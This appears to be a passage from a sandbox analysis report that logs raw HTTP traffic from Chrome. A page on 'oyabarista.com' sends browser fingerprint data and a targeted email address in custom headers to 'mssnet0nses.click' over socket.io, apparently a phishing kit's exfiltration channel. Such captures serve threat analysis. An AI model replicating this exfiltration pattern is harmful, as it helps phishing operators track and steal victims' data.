                                                        Data Ascii: Bnative+code%5D+%7D%22%2C%22SVGAnimatedString%22%3A%22function+SVGAnimatedString%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22SVGAnimatedRect%22%3A%22function+SVGAnimatedRect%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22SVGAnimatedPreserveAspectRatio%22%3A%22functi
                                                        2025-03-27 13:41:56 UTC16384OUTData Raw: 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 54 61 62 6c 65 43 6f 6c 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 54 61 62 6c 65 43 6f 6c 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 54 61 62 6c 65 43 65 6c 6c 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 54 61 62 6c 65 43 65 6c 6c 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 54 61 62 6c 65 43 61 70 74 69 6f 6e 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 54 61 62
                                                        Data Ascii: 7D%22%2C%22HTMLTableColElement%22%3A%22function+HTMLTableColElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22HTMLTableCellElement%22%3A%22function+HTMLTableCellElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22HTMLTableCaptionElement%22%3A%22function+HTMLTab
                                                        2025-03-27 13:41:56 UTC16384OUTData Raw: 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 43 53 53 4c 61 79 65 72 42 6c 6f 63 6b 52 75 6c 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 43 53 53 4c 61 79 65 72 42 6c 6f 63 6b 52 75 6c 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 43 53 53 4b 65 79 77 6f 72 64 56 61 6c 75 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 43 53 53 4b 65 79 77 6f 72 64 56 61 6c 75 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 43 53 53 4b 65 79 66 72 61 6d 65 73 52 75 6c 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 43 53 53 4b 65 79 66
                                                        Data Ascii: B+%5Bnative+code%5D+%7D%22%2C%22CSSLayerBlockRule%22%3A%22function+CSSLayerBlockRule%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22CSSKeywordValue%22%3A%22function+CSSKeywordValue%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22CSSKeyframesRule%22%3A%22function+CSSKeyf
                                                        2025-03-27 13:41:56 UTC16384OUTData Raw: 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 46 69 6c 65 53 79 73 74 65 6d 46 69 6c 65 48 61 6e 64 6c 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 46 69 6c 65 53 79 73 74 65 6d 46 69 6c 65 48 61 6e 64 6c 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 46 69 6c 65 53 79 73 74 65 6d 48 61 6e 64 6c 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 46 69 6c 65 53 79 73 74 65 6d 48 61 6e 64 6c 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 46 69 6c 65 53 79 73 74 65 6d 57 72 69 74 61 62 6c 65 46 69 6c 65 53 74
                                                        Data Ascii: %28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22FileSystemFileHandle%22%3A%22function+FileSystemFileHandle%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22FileSystemHandle%22%3A%22function+FileSystemHandle%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22FileSystemWritableFileSt
                                                        2025-03-27 13:41:56 UTC16384OUTData Raw: 32 25 32 43 25 32 32 54 61 73 6b 53 69 67 6e 61 6c 25 32 32 25 32 43 25 32 32 54 61 73 6b 50 72 69 6f 72 69 74 79 43 68 61 6e 67 65 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 54 61 73 6b 43 6f 6e 74 72 6f 6c 6c 65 72 25 32 32 25 32 43 25 32 32 54 61 73 6b 41 74 74 72 69 62 75 74 69 6f 6e 54 69 6d 69 6e 67 25 32 32 25 32 43 25 32 32 53 79 6e 63 4d 61 6e 61 67 65 72 25 32 32 25 32 43 25 32 32 53 75 62 6d 69 74 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 53 74 79 6c 65 53 68 65 65 74 4c 69 73 74 25 32 32 25 32 43 25 32 32 53 74 79 6c 65 53 68 65 65 74 25 32 32 25 32 43 25 32 32 53 74 79 6c 65 50 72 6f 70 65 72 74 79 4d 61 70 52 65 61 64 4f 6e 6c 79 25 32 32 25 32 43 25 32 32 53 74 79 6c 65 50 72 6f 70 65 72 74 79 4d 61 70 25 32 32 25 32 43 25 32 32 53 74 6f 72
                                                        Data Ascii: 2%2C%22TaskSignal%22%2C%22TaskPriorityChangeEvent%22%2C%22TaskController%22%2C%22TaskAttributionTiming%22%2C%22SyncManager%22%2C%22SubmitEvent%22%2C%22StyleSheetList%22%2C%22StyleSheet%22%2C%22StylePropertyMapReadOnly%22%2C%22StylePropertyMap%22%2C%22Stor
                                                        2025-03-27 13:41:56 UTC16384OUTData Raw: 32 63 6c 6f 73 65 25 32 32 25 32 43 25 32 32 63 6f 6e 66 69 72 6d 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 49 6d 61 67 65 42 69 74 6d 61 70 25 32 32 25 32 43 25 32 32 66 65 74 63 68 25 32 32 25 32 43 25 32 32 66 69 6e 64 25 32 32 25 32 43 25 32 32 66 6f 63 75 73 25 32 32 25 32 43 25 32 32 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 25 32 32 25 32 43 25 32 32 67 65 74 53 65 6c 65 63 74 69 6f 6e 25 32 32 25 32 43 25 32 32 6d 61 74 63 68 4d 65 64 69 61 25 32 32 25 32 43 25 32 32 6d 6f 76 65 42 79 25 32 32 25 32 43 25 32 32 6d 6f 76 65 54 6f 25 32 32 25 32 43 25 32 32 6f 70 65 6e 25 32 32 25 32 43 25 32 32 70 6f 73 74 4d 65 73 73 61 67 65 25 32 32 25 32 43 25 32 32 70 72 69 6e 74 25 32 32 25 32 43 25 32 32 70 72 6f 6d 70 74 25 32 32 25 32 43 25 32 32
                                                        Data Ascii: 2close%22%2C%22confirm%22%2C%22createImageBitmap%22%2C%22fetch%22%2C%22find%22%2C%22focus%22%2C%22getComputedStyle%22%2C%22getSelection%22%2C%22matchMedia%22%2C%22moveBy%22%2C%22moveTo%22%2C%22open%22%2C%22postMessage%22%2C%22print%22%2C%22prompt%22%2C%22
                                                        2025-03-27 13:41:56 UTC15956OUTData Raw: 53 74 61 6d 70 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 74 69 6d 65 53 74 61 6d 70 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 6f 6e 74 65 78 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 6f 6e 74 65 78 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 54 61 73 6b 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 72 65 61 74 65 54 61 73 6b 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 6d 65 6d 6f 72 79 25 32 32 25 33 41 25 32 32 25 35 42 6f 62 6a 65 63 74 2b 4d 65 6d 6f 72
                                                        Data Ascii: Stamp%22%3A%22function+timeStamp%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22context%22%3A%22function+context%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22createTask%22%3A%22function+createTask%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22memory%22%3A%22%5Bobject+Memor


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        67192.168.2.549820172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:56 UTC450OUTGET /socket.io/?EIO=4&transport=polling&t=PNNre0C&sid=tT5WNbS8nK_GmKtDAAfC HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:56 UTC831INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 27 Mar 2025 13:41:56 GMT
                                                        Content-Type: application/json
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kBkMFhW7IWEpos1%2B%2Fs4hIazAhpy%2Fpt1%2FizBdb4G2DtGHqvTXOThc33uZSBLszzsYaGuRwF1ALwF9rsHu5E3Rk8FhdB5NkRyd90EaaaU3K9sjvHQetEjPQXdtrnS6LJXxlVUdbA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4ee59858f82f-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=84410&min_rtt=84366&rtt_var=17864&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1022&delivery_rate=36172&cwnd=252&unsent_bytes=0&cid=9bafa0f7cb92c574&ts=306&x=0"
                                                        2025-03-27 13:41:56 UTC47INData Raw: 32 39 0d 0a 7b 22 63 6f 64 65 22 3a 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 53 65 73 73 69 6f 6e 20 49 44 20 75 6e 6b 6e 6f 77 6e 22 7d 0d 0a
                                                        Data Ascii: 29{"code":1,"message":"Session ID unknown"}
                                                        2025-03-27 13:41:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        68192.168.2.549821172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:57 UTC567OUTOPTIONS /socket.io/?EIO=4&transport=polling&t=PNNreWw HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Access-Control-Request-Method: GET
                                                        Access-Control-Request-Headers: auth_uid,session_email
                                                        Origin: https://www.oyabarista.com
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:57 UTC947INHTTP/1.1 204 No Content
                                                        Date: Thu, 27 Mar 2025 13:41:57 GMT
                                                        Content-Length: 0
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                        Vary: Access-Control-Request-Headers
                                                        Access-Control-Allow-Headers: auth_uid,session_email
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Om4cDGkxk%2F2ckXJD8FU7%2F9eUtXER6f2VF%2FITYob0OwXNUUH21B25iyGA9zstOSR9ldsijXxBfCm4t9FqLoz2%2B3OPkojRQdeWx3O4Xbg%2Bq%2BfBjbFiwN2kDxxrEITXKXGcZPgwHg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4ee87fa65e65-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=83722&min_rtt=83683&rtt_var=17673&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1139&delivery_rate=36507&cwnd=252&unsent_bytes=0&cid=b2f6a760292bc0e6&ts=312&x=0"


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        69192.168.2.549822172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:57 UTC667OUTGET /socket.io/?EIO=4&transport=polling&t=PNNreWw HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Auth_UID: USER04032025U29030403
                                                        Session_Email: info@kostal.com
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Origin: https://www.oyabarista.com
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:57 UTC851INHTTP/1.1 200 OK
                                                        Date: Thu, 27 Mar 2025 13:41:57 GMT
                                                        Content-Type: text/plain; charset=UTF-8
                                                        Content-Length: 118
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cache-control: no-store
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xa0lt0YZ4U40YSEQqnv9U0%2F0A3bKRlfznIxPWdXizz%2FKAQMIMBbdhuUwfj6w7XkKz4c4ZKquDPAo%2Fyg5Pk7bWwXFIjB%2BFLJ1pwK7Z4C0tbZ9h6E8Fe9Tyux%2Br28eRRIAe1v6wg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4eeb8f4a33a6-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=84690&min_rtt=83852&rtt_var=18540&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1239&delivery_rate=36435&cwnd=252&unsent_bytes=0&cid=cf097ace6974fe0f&ts=262&x=0"
                                                        2025-03-27 13:41:57 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 31 74 54 32 5a 59 78 50 37 65 49 67 69 6a 7a 64 41 41 66 46 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
                                                        Data Ascii: 0{"sid":"1tT2ZYxP7eIgijzdAAfF","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        70192.168.2.549823172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:57 UTC593OUTOPTIONS /socket.io/?EIO=4&transport=polling&t=PNNrelM&sid=1tT2ZYxP7eIgijzdAAfF HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Access-Control-Request-Method: POST
                                                        Access-Control-Request-Headers: auth_uid,session_email
                                                        Origin: https://www.oyabarista.com
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:58 UTC943INHTTP/1.1 204 No Content
                                                        Date: Thu, 27 Mar 2025 13:41:58 GMT
                                                        Content-Length: 0
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                        Vary: Access-Control-Request-Headers
                                                        Access-Control-Allow-Headers: auth_uid,session_email
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5GBW5N%2FKfaDX5o7MmqWMP7QOxSPPOLIHh8mX1WIIEo2EI85lwm8TzR%2Fikqdbhb8w4h2zccBIB0COmqpFR4G5qTAy6UhTOk2cTO9L%2FqWwb0MaQI%2FOyQXCaugGjYvExE7QChLvEA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4eee4d09377d-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=84113&min_rtt=83866&rtt_var=18064&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1165&delivery_rate=36124&cwnd=252&unsent_bytes=0&cid=563dbd3c76d4ce88&ts=309&x=0"


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        71192.168.2.549825172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:57 UTC566OUTGET /socket.io/?EIO=4&transport=websocket&sid=1tT2ZYxP7eIgijzdAAfF HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: Upgrade
                                                        Pragma: no-cache
                                                        Cache-Control: no-cache
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Upgrade: websocket
                                                        Origin: https://www.oyabarista.com
                                                        Sec-WebSocket-Version: 13
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Sec-WebSocket-Key: ZSPtxHVB7Jb3tq1ajYhNUQ==
                                                        Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                        2025-03-27 13:41:58 UTC825INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 27 Mar 2025 13:41:58 GMT
                                                        Content-Type: application/json
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Yib248aco65OKF2wYxiVusmyf8UUkZEwdXn2VemRn2p1TOltbN3MZkqUGzvSMjDYDZK9U7OyKcsOwxPtyAOqTXFy0hpCmtXIwHh2p0ZJiwcRZKLsWpCfngvwBRRbUU%2BSJYfxKA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4eee4b767d11-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=83591&min_rtt=83523&rtt_var=17725&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1121&delivery_rate=36500&cwnd=252&unsent_bytes=0&cid=3f9146679df0ea28&ts=312&x=0"
                                                        2025-03-27 13:41:58 UTC40INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a
                                                        Data Ascii: 22{"code":3,"message":"Bad request"}
                                                        2025-03-27 13:41:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        72192.168.2.549826172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:57 UTC425OUTGET /socket.io/?EIO=4&transport=polling&t=PNNreWw HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:58 UTC300INHTTP/1.1 200 OK
                                                        Date: Thu, 27 Mar 2025 13:41:58 GMT
                                                        Content-Type: text/plain; charset=UTF-8
                                                        Content-Length: 118
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Cache-Control: no-store
                                                        Cf-Cache-Status: DYNAMIC
                                                        Server: cloudflare
                                                        CF-RAY: 926f4eee4b1fc337-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2025-03-27 13:41:58 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 42 64 44 74 4d 66 75 48 66 5f 52 73 58 34 6c 53 41 41 66 47 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
                                                        Data Ascii: 0{"sid":"BdDtMfuHf_RsX4lSAAfG","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        73192.168.2.549824172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:57 UTC592OUTOPTIONS /socket.io/?EIO=4&transport=polling&t=PNNrelO&sid=1tT2ZYxP7eIgijzdAAfF HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Access-Control-Request-Method: GET
                                                        Access-Control-Request-Headers: auth_uid,session_email
                                                        Origin: https://www.oyabarista.com
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:58 UTC375INHTTP/1.1 204 No Content
                                                        Date: Thu, 27 Mar 2025 13:41:58 GMT
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                        Vary: Access-Control-Request-Headers
                                                        Access-Control-Allow-Headers: auth_uid,session_email
                                                        Cf-Cache-Status: DYNAMIC
                                                        Server: cloudflare
                                                        CF-RAY: 926f4eee4a228c7b-EWR
                                                        alt-svc: h3=":443"; ma=86400


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        74192.168.2.549827172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:58 UTC752OUTPOST /socket.io/?EIO=4&transport=polling&t=PNNrelM&sid=1tT2ZYxP7eIgijzdAAfF HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Content-Length: 2
                                                        Auth_UID: USER04032025U29030403
                                                        Session_Email: info@kostal.com
                                                        sec-ch-ua-platform: "Windows"
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Content-type: text/plain;charset=UTF-8
                                                        Origin: https://www.oyabarista.com
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:58 UTC2OUTData Raw: 34 30
                                                        Data Ascii: 40
                                                        2025-03-27 13:41:58 UTC838INHTTP/1.1 200 OK
                                                        Date: Thu, 27 Mar 2025 13:41:58 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cache-control: no-store
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PM6zTKNr8E50pCFt%2F8FoJK8hUhEW%2BasNciDbBkKusFQ6XYuI9tEDNqMosY5cFBHhMTrNCKDhTklqbbYy%2B9icq2Q39f3F6FE8YgLfldKSSIdubpR9LrWGbs1mrYzd2BKyFQaMCw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4ef15eb28c42-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=85281&min_rtt=84978&rtt_var=18382&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1348&delivery_rate=35587&cwnd=252&unsent_bytes=0&cid=dc7e4f4931c08422&ts=311&x=0"
                                                        2025-03-27 13:41:58 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                        Data Ascii: 2ok
                                                        2025-03-27 13:41:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        75192.168.2.549828172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:58 UTC692OUTGET /socket.io/?EIO=4&transport=polling&t=PNNrelO&sid=1tT2ZYxP7eIgijzdAAfF HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Auth_UID: USER04032025U29030403
                                                        Session_Email: info@kostal.com
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Origin: https://www.oyabarista.com
                                                        Sec-Fetch-Site: cross-site
